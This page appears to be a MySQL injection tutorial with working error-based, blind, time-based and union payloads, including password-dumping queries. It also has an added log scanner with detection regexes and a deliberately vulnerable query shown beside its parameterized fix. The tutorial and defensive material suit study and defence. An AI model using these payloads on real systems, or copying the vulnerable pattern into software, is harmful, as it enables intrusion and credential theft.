MySQL injection mode

Source: Internet
Author: User
Tags: mysql, injection, xpath

0x00 – Error-based injection
In MySQL injection we sometimes get no normal data echoed back to us. In that case we force the query to raise an error, so that the error message itself carries the data we want.

The functions commonly used for this are floor(), updatexml() and extractvalue(). These three are available in most MySQL versions; the others listed below may be missing in older versions.

floor()
Statement: and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

mysql> select 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.5.401' for key 'group_key'
updatexml()
Statement: and (updatexml(1,concat(0x3a,(select user())),1));
mysql> select 1 and (updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
extractvalue()
Same usage as updatexml().
Statement: and extractvalue(1,concat(0x5c,(select user())));
mysql> select 1 and extractvalue(1,concat(0x5c,(select user())));
ERROR 1105 (HY000): XPATH syntax error: '\root@localhost'
geometrycollection() (MySQL version > 4.1)
multipoint()
polygon()
linestring()
multipolygon()
multilinestring()
These are the spatial extension functions that MySQL introduced after release 4.1, giving it some spatial data processing capability. The statements all follow the same pattern; one example:
Statement: and geometrycollection((select * from (select user() a) b));
mysql> select 1 and geometrycollection((select * from (select user()) b));
ERROR 1367 (22007): Illegal non geometric '(select `b`.`user()` from (select 'root@localhost' AS `user()` from dual) `b`)' value found during parsing
0x01 – Blind injection
Blind injection comes in two types: ordinary (boolean-based) blind injection, and time-based blind injection, also called delay injection.
With the help of some string-processing functions we have to obtain the data by guessing it, one character at a time. In the statements below N is the position of the character being guessed.
Query the database name: and ascii(substr((select schema_name from information_schema.schemata limit 0,1),N,1))=<ascii code>
Query the user length: and (select length(user()))=12;
Query the database name: and ascii(substr(database(),N,1))=<ascii code>;
Query the user: and 1=(if(ascii(mid(user() from N for 1))=<ascii code of the Nth character>,1,0));
Time-based blind injection
This is just the ordinary blind injection with an if() judgement added:
and if(ascii(mid(user() from N for 1))=<ascii code>,sleep(3),0)
and 1=if(ascii(mid((select user()) from 1 for 1))=114,sleep(3),0);
and 1=(case when ascii(mid(user() from N for 1))=<ascii code> then benchmark(5*4000000,md5(1111)) else 0 end)=1
and 1=if(length(user())=<length>,sleep(3),0);
aaa' xor (if(ascii(mid(user() from N for 1))=<ascii code of the Nth character>,sleep(3),0)) or 'bbb
and sleep(1-abs(sign(ascii(mid(lower(user()) from N for 1))-<ascii code>)))
Without an equals sign
The ASCII code of one character at a time is subtracted from the candidate ASCII code, and the absolute value of the sign of the difference is taken.
If they are equal, the sign is 0, its absolute value is 0, and sleep(1) delays the response.
If they differ, the sign is 1 or -1, its absolute value is 1, and sleep(0) produces no delay.
The data can then be obtained quickly with a Python script.
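From the defender's side, every payload in the two sections above leaves a recognisable fingerprint in the statement text that reaches the server. The following scanner, added here as an example and not part of the original page, applies one regex per technique (error-based functions, sleep()/benchmark(), ascii()/substr()/mid() character probes, information_schema enumeration) to lines shaped like MySQL's general_log text output. The log lines are constructed for the example, the timestamp/thread/command layout is assumed, and the rule names are my own.

```python
import re
from typing import Dict, List

# Constructed sample in the shape of a MySQL general_log text file (not real logs).
# Thread 12 runs the page's error-based, boolean-blind, time-based and
# information_schema payloads against a news lookup; thread 13 is benign.
SAMPLE_LOG = """\
2024-01-01T10:00:01.000000Z  12 Query  SELECT id,title FROM news WHERE id=7
2024-01-01T10:00:02.000000Z  12 Query  SELECT id,title FROM news WHERE id=7 and updatexml(1,concat(0x3a,(select user())),1)
2024-01-01T10:00:03.000000Z  12 Query  SELECT id,title FROM news WHERE id=7 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)
2024-01-01T10:00:04.000000Z  12 Query  SELECT id,title FROM news WHERE id=7 and ascii(substr(database(),1,1))=116
2024-01-01T10:00:05.000000Z  12 Query  SELECT id,title FROM news WHERE id=7 and 1=if(length(user())=14,sleep(3),0)
2024-01-01T10:00:06.000000Z  12 Query  SELECT id,title FROM news WHERE id=7 and sleep(1-abs(sign(ascii(mid(lower(user()) from 1 for 1))-114)))
2024-01-01T10:00:07.000000Z  12 Query  SELECT id,title FROM news WHERE id=7 and 1=2 union select 1,2,3,schema_name,5 from information_schema.schemata limit 0,1
2024-01-01T10:00:08.000000Z  13 Query  SELECT name FROM products WHERE name LIKE '%sleeping bag%'
"""

# One regex per technique described on the page; matching is case-insensitive.
RULES = [
    ("error-based", re.compile(
        r"\b(updatexml|extractvalue)\s*\("
        r"|floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)"
        r"|\b(geometrycollection|multipoint|polygon|linestring|multipolygon|multilinestring)\s*\(\s*\(?\s*select\b",
        re.I)),
    ("time-based", re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
    ("boolean-blind", re.compile(
        r"\bascii\s*\(\s*(substr|substring|mid)\s*\("
        r"|\blength\s*\(\s*(user|database)\s*\(\s*\)\s*\)\s*=",
        re.I)),
    ("schema-enumeration", re.compile(
        r"\binformation_schema\s*\.\s*(schemata|tables|columns)\b|\bmysql\s*\.\s*user\b", re.I)),
]

# Assumed general_log line layout: timestamp, thread id, command type, statement text.
LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<thread>\d+)\s+(?P<cmd>\w+)\s+(?P<sql>.+)$")


def classify(sql: str) -> List[str]:
    """Return the technique labels whose pattern occurs in one statement."""
    return [name for name, rx in RULES if rx.search(sql)]


def scan_general_log(text: str) -> List[Dict]:
    """Parse general_log lines and keep the Query entries that match a rule."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m or m.group("cmd") != "Query":
            continue
        tags = classify(m.group("sql"))
        if tags:
            hits.append({"time": m.group("ts"), "thread": int(m.group("thread")),
                         "tags": tags, "sql": m.group("sql")})
    return hits


def flagged_per_thread(hits: List[Dict]) -> Dict[int, int]:
    """Count flagged statements per connection thread. A run of character
    probes from one thread is the signal worth alerting on, not a single hit."""
    counts: Dict[int, int] = {}
    for h in hits:
        counts[h["thread"]] = counts.get(h["thread"], 0) + 1
    return counts


if __name__ == "__main__":
    found = scan_general_log(SAMPLE_LOG)
    for h in found:
        print(h["time"], h["thread"], ",".join(h["tags"]), h["sql"][:60])
    print(flagged_per_thread(found))
```

The word-boundary and `\(` anchors keep ordinary text such as `'%sleeping bag%'` from matching the sleep() rule; the per-thread count is what turns the boolean and time-based probes, which are individually harmless-looking, into an alert, since guessing one character at a time produces dozens of near-identical statements from one connection.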
0x02 – Common MySQL injection statements
Query the database names (MySQL > 5.0)
MySQL 5 and above ship with the built-in information_schema database, which stores the structure information of every database and table in the instance.
and 1=2 union select 1,2,3,schema_name,5,6,7,8,9,10 from information_schema.schemata limit 0,1
Guess the tables
and 1=2 union select 1,2,3,table_name,5,6,7,8,9,10 from information_schema.tables where table_schema=<database name, hex-encoded> limit 0,1
(limit 0,1: the first number is the starting record, 0 being the first; the second is the number of records shown)
Guess the columns
and 1=2 union select 1,2,3,column_name,5,6,7,8,9,10 from information_schema.columns where table_name=<table name, hex-encoded> limit 0,1
Dump the password
and 1=2 union select <username column>,5,6,7,<password column>,8,9 from <table name> limit 0,1
Advanced usage (one displayable field shows two pieces of data):
union select 1,2,3,concat(<username column>,0x3c,<password column>),5,6,7,8,9 from <table name> limit 0,1
system_user()          system user name
user()                 user name
current_user           current user name
session_user()         user name of the database connection
database()             database name
version()              MySQL database version
load_file()            MySQL function for reading a local file
@@datadir              database data path
@@basedir              MySQL installation path
@@version_compile_os   operating system (e.g. Windows Server 2003)
Determine whether you have file read/write privileges
and (select count(*) from mysql.user)>0/*
and (select count(file_priv) from mysql.user)>0/*
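All of the union statements in this section work only because the application pastes the request parameter into the SQL text. The following example, added here and not part of the original page, shows that defect beside its fix: the same lookup written with string concatenation and with a bound parameter. sqlite3 stands in for MySQL so the code runs offline (an assumption; a MySQL driver would use %s placeholders instead of ?), and the tables, rows and payload are constructed for the example.

```python
import sqlite3
from typing import List, Tuple

# sqlite3 stands in for MySQL so the example runs offline (assumption). The
# concatenation defect and the parameter-binding fix look the same with a MySQL
# driver, which would use %s placeholders instead of ? in the safe query.


def setup_db() -> sqlite3.Connection:
    """Create an in-memory schema with a public table and a sensitive one.
    All rows are constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news(id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE admin(id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO news VALUES (7, 'Release notes');
        INSERT INTO admin VALUES (1, 'admin', 'constructed-hash-value');
    """)
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, news_id: str) -> List[Tuple]:
    """The defect: the request parameter is pasted into the SQL text, so
    'and 1=2 union select ...' becomes part of the query grammar."""
    sql = "SELECT id, title FROM news WHERE id=" + news_id
    return conn.execute(sql).fetchall()


def safe_lookup(conn: sqlite3.Connection, news_id: str) -> List[Tuple]:
    """The fix: the parameter is bound as a value and is never parsed as SQL,
    so the same payload is compared against the id column and matches no row."""
    return conn.execute("SELECT id, title FROM news WHERE id=?", (news_id,)).fetchall()


# The page's 'and 1=2 union select ... limit 0,1' pattern, aimed at the constructed admin table.
UNION_PAYLOAD = "7 and 1=2 union select username, password from admin limit 0,1"

if __name__ == "__main__":
    conn = setup_db()
    print("vulnerable:", vulnerable_lookup(conn, UNION_PAYLOAD))  # leaks the admin row
    print("safe:      ", safe_lookup(conn, UNION_PAYLOAD))        # []
```

Binding the parameter is the fix that removes the whole class; the two mysql.user checks at the end of the section are a reminder of the second layer, since an application account granted only the privileges it needs on its own schema gets a permission error on mysql.user and, lacking the FILE privilege, cannot call load_file() at all.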
